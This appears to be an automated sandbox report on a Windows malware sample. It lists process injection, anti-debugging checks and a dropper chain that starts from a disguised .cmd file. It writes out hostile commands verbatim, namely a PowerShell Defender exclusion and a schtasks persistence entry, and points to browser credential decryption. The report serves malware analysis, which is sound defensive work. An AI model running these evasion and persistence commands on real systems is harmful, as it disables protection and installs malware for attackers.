                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 25270000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 254E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 25310000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: C90000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 25E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 45E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 59B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2D9B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 29D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 49D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 336B0000 memory reserve | memory write watch
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 33A90000 memory reserve | memory write watch
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 33870000 memory reserve | memory write watch
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 2CE60000 memory reserve | memory write watch
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 2D2E0000 memory reserve | memory write watch
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 2F2E0000 memory reserve | memory write watch
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 2D000000 memory reserve | memory write watch
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 2ED90000 memory reserve | memory write watch
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 30D90000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 2D60000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 2DF0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 4DF0000 memory reserve | memory write watch
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6262Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 522
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_8-14258
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 3940Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 7096Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5716Thread sleep count: 6262 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6140Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5356Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 5036Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 6940Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 3524Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 5700Thread sleep time: -31320000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 5700Thread sleep time: -60000s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B258B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02B258B4
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                        Source: Oupzhkpr.PIF, 00000011.00000002.2311886238.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(+f
                        Source: x.exe, 00000004.00000002.2175552195.00000000006B4000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2175552195.000000000066E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Microsofts.exe, 0000000A.00000002.3367947903.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000016.00000002.2408866891.0000000000836000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000002.2525132204.0000000000934000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_4-25973
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFAPI call chain: ExitProcess graph end nodegraph_22-26795
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3EBE8 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,4_2_02B3EBE8
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess queried: DebugPort
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess queried: DebugPort
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 10_2_0283C168 LdrInitializeThunk,LdrInitializeThunk,10_2_0283C168
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040CE09
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B38798 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02B38798
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_0040ADB0 GetProcessHeap,HeapFree,8_2_0040ADB0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess token adjusted: Debug
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040CE09
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040E61C
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00416F6A
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_004123F1 SetUnhandledExceptionFilter,8_2_004123F1
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_1_0040CE09
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_1_0040E61C
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_1_00416F6A
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_004123F1 SetUnhandledExceptionFilter,8_1_004123F1
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_0040CE09
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_0040E61C
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00416F6A
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_004123F1 SetUnhandledExceptionFilter,21_2_004123F1
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_1_0040CE09
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_1_0040E61C
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_1_00416F6A
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_004123F1 SetUnhandledExceptionFilter,21_1_004123F1
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_0040CE09
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_0040E61C
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00416F6A
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_004123F1 SetUnhandledExceptionFilter,26_2_004123F1
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_1_0040CE09
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_1_0040E61C
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_1_00416F6A
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_004123F1 SetUnhandledExceptionFilter,26_1_004123F1
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_0040CE09
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_0040E61C
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00416F6A
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_004123F1 SetUnhandledExceptionFilter,31_2_004123F1
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_1_0040CE09
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_1_0040E61C
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_1_00416F6A
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_004123F1 SetUnhandledExceptionFilter,31_1_004123F1
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: Microsofts.exe.8.dr, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                        Source: Microsofts.exe.8.dr, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                        Source: Microsofts.exe.8.dr, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000Jump to behavior
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
                        Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 26A008Jump to behavior
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 291008
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 28E008
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 26A008
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO_KB#67897.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pifJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" Jump to behavior
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02B25A78
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02B2A790
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02B2A744
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02B25B84
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,8_2_00417A20
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,8_1_00417A20
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,21_2_00417A20
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,21_1_00417A20
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,22_2_02BC5A78
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: GetLocaleInfoA,22_2_02BCA790
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,22_2_02BC5B83
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,26_2_00417A20
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,26_1_00417A20
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,31_2_00417A20
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,31_1_00417A20
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsofts.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
